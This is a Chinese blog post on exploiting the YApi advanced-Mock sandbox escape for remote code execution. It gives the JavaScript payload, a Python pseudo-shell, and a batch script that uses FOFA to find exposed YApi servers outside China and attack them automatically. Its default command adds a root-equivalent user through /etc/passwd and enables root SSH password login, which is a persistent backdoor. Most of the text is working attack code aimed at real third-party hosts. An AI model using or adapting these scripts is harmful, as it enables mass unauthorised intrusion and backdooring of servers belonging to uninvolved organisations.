YapiRCE复现和批量编写

科技一颗大心心 2024-06-10 12:03:09
一、漏洞复现

首先祭出fofa,搜索语句为 app="yapi",但是为了避开国内,所以使用 app="yapi" && country="SG",SG为新加坡,结果如图

虽然有30页,但是能利用的可能也没几个,而且 docker 居多

顺便记录一下验证 docker 的两个小方法

ps -ef :docker 一般显示很少的进程ls -a /.dockerenv

点击注册,信息随便填,但是可能会遇到这种情况

这是第一道坎,不,第一道坎应该是压根就访问不了,这是第二道坎

找了个能注册的,注册完进入如图页面,点击 添加项目

添加完项目进入如下页面,继续 添加接口

添加完接口进入如下页面,点击 高级Mock

将《高级Mock可以获取到系统操作权限》中的exp,保存到脚本中,但是这里可能保存不成功,第三道坎

const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

回到预览页面,点击下方的链接

可以看到命令成功执行了,而且这很大概率不是docker,然后这里有第四道坎,命令可能根本执行不成功,比如 百度yapi

#二、伪shell的编写

一开始只是想写个脚本,快速改Mock脚本,返回执行结果,假装拿到了一个shell

# coding=utf-8import jsonimport requestsurl = 'http://ip:port/'r = requests.session()projectID = '131' # http://ip:port/project/131/interface/api/1141interfaceID = '1141' # 131 projectID 1141 interfaceIDheaders = { 'Content-Type': 'application/json'}def login(): data = { "email": "sad@qq.com", "password": "asd" } rsp = r.post(url + 'api/user/login', data=json.dumps(data), headers=headers) print(rsp.text)def rce(cmd): # 这里做了优化,对全局变量进行修改,需要关闭 ‘高级Mock’ 中的脚本 poc = '''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''.format(cmd) data = {"id": projectID, "project_mock_script": f'''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{cmd}").toString()''', "is_mock_open": True} rsp = r.post(url + 'api/project/up', data=json.dumps(data), headers=headers) print(rsp.text)def result(): url2 = url + f'mock/{projectID}/1/1' rsp = r.get(url2, headers=headers) print(rsp.text)if __name__ == '__main__': login() while True: cmd = input('$ ') rce(cmd) result()

该处使用的url网络请求的数据。

#二、批量脚本

可能人就是太不能满足了吧,写完 伪shell脚本 之后我又觉得再加点料就能整个批量了,然后就有了下面的脚本

提示:脚本中使用的命令可能无法正常运行,反弹shell才是永远的神。比如我就经常遇到 useradd 不存在的报错,但是这种明显是可以执行命令的。所以请关注脚本的输出

#fofa.py

通过 pip install fofa 下载,但是在 python3 中并不能正常运行,所以我修改了一下脚本,改名为 fofa.py 放在脚本的执行目录。

# -*- coding: utf-8 -*-import base64import jsonimport urllibimport urllib.errorimport urllib.parseimport urllib.requestclass Client: def __init__(self, email, key): self.email = email self.key = key self.base_url = "https://fofa.so" self.search_api_url = "/api/v1/search/all" self.login_api_url = "/api/v1/info/my" self.get_userinfo() # check email and key def get_userinfo(self): api_full_url = "%s%s" % (self.base_url, self.login_api_url) param = {"email": self.email, "key": self.key} res = self.__http_get(api_full_url, param) return json.loads(res) def get_data(self, query_str, page=1, fields=""): res = self.get_json_data(query_str, page, fields) return json.loads(res) def get_json_data(self, query_str, page=1, fields=""): api_full_url = "%s%s" % (self.base_url, self.search_api_url) param = {"qbase64": base64.b64encode(query_str), "email": self.email, "key": self.key, "page": page, "fields": fields} res = self.__http_get(api_full_url, param) return res def __http_get(self, url, param): param = urllib.parse.urlencode(param) url = "%s?%s" % (url, param) try: req = urllib.request.Request(url) res = urllib.request.urlopen(req).read() if b"errmsg" in res: raise RuntimeError(res) except urllib.error.HTTPError as e: print("errmsg:" + e.read().decode()), raise e return res#fofasearch.pyimport reimport fofaclass Fofa: email = fofa_account key = key # key 在 个人资料中 client = fofa.Client(email, key) def __init__(self, query_str): self.query_str = query_str def search(self, page): hostList = [] data = self.client.get_data(self.query_str.encode(), page=page, fields="host") for host in data['results']: if re.search('http[s]?://', host) is None: host = 'http://' + host if re.search('/$', host) is not None: host = host[:-1] hostList.append(host) return hostListif __name__ == '__main__': F = Fofa('app="yapi"') for page in range(1, 10): print(F.search(page))#yapi.py# coding=utf-8import jsonimport sysimport requestsfrom fofasearch import Fofaexp = '''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''class Yapi: def __init__(self, url): self.r = requests.session() self.url = url self.headers = {'Content-Type': 'application/json'} print('\n\n' + '*' * 10 + url + '*' * 10) def register(self, email, passwd, username): data = { "email": email, "password": passwd, "username": username } rsp = self.r.post(self.url + '/api/user/reg', data=json.dumps(data), headers=self.headers, timeout=2) # print(rsp) print(json.loads(rsp.text)['errmsg']) return json.loads(rsp.text)['errmsg'] def login(self, email, passwd): data = { "email": email, "password": passwd } rsp = self.r.post(self.url + '/api/user/login', data=json.dumps(data), headers=self.headers, timeout=2) print(json.loads(rsp.text)['errmsg']) return json.loads(rsp.text)['errmsg'] def getGroupId(self): rsp = self.r.get(self.url + '/api/group/get_mygroup', timeout=2) return json.loads(rsp.text)['data']['_id'] def addProject(self, groupid): data = { "name": "1", "basepath": "/1", "desc": "1", "group_id": groupid, "icon": "code-o", "color": "pink", "project_type": "private" } rsp = self.r.post(self.url + '/api/project/add', data=json.dumps(data), headers=self.headers, timeout=2) projectId = json.loads(rsp.text)['data']['_id'] return projectId def addInterface(self, projectID): data = { "method": "GET", "catid": "112", "title": "1", "path": "/1", "project_id": projectID } rsp = self.r.post(self.url + '/api/interface/add', data=json.dumps(data), headers=self.headers, timeout=2) interfaceID = json.loads(rsp.text)['data']['_id'] return interfaceID def isDocker(self, projectID): data = {"id": projectID, "project_mock_script": exp.format('ls -al /'), "is_mock_open": True} self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers, timeout=10) def rce(self, cmd, projectID, interfaceId): data = {"id": projectID, "project_mock_script": exp.format(cmd), "is_mock_open": True} rsp = self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers) # print(rsp.text) def result(self, projectId): url2 = self.url + f'/mock/{projectId}/1/1' rsp = self.r.get(url2, headers=self.headers) return rsp.textdef main(host, cmd='', email="jklasdsd@yapi.com", passwd="123456", username="admin", shell=False, passDocker=False): y = Yapi(host) try: regResult = y.register(email, passwd, username) except: print('register failed') return if regResult == '该email已经注册': try: print('try Login...') result = y.login(email, passwd) if result != 'logout success...': print('login failed...') return except: print('Login failed') return try: groupId = y.getGroupId() projectID = y.addProject(groupId) print('projectID: ' + str(projectID)) interfaceID = y.addInterface(projectID) except: return try: y.isDocker(projectID) result = y.result(projectID) except: print('Command execution failed') return if '.dockerenv' in result: print('this is Docker') if passDocker: return if shell: while True: cmd = input('\n# ') y.rce(cmd, projectID, interfaceID) y.result(projectID) else: try: y.rce(cmd, projectID, interfaceID) result = y.result(projectID) except: print('Command execution failed') return if 'Invalid or unexpected token' in result: print('Command execution failed') elif len(result) == 0: print('no echo') else: try: print(result) except: print(result.encode())if __name__ == '__main__': query_str = 'app="yapi" && country!="CN"' cmd = '''adduser sddads && echo 'sddads:Ll123@lL'|chpasswd && sed -i '$csddads:x:0:0:root:/root:/bin/bash' /etc/passwd && sed -i 's/#* *PermitRootLogin.*/PermitRootLogin yes/g' /etc/ssh/sshd_config && sed -i 's/#* *PasswordAuthentication.*/PasswordAuthentication yes/g' /etc/ssh/sshd_config && echo 'success' && systemctl reload ssh | systemctl reload sshd''' # 这里是要执行的命令 # f = open('yapi.log', 'a') # sys.stdout = f F = Fofa(query_str) for page in range(1, 58): hostList = F.search(page) for host in hostList: try: requests.get(host, timeout=2) except: print('\n\n' + '*'*10 + host + '*'*10) print('connection failed') continue main(host, cmd) # f.close()

跑起来就是这种效果,但是我的那套命令不是很好,通常是解析出错,可以的话,师傅们能给点指导意见嘛

0 阅读:2

科技一颗大心心

简介:感谢大家的关注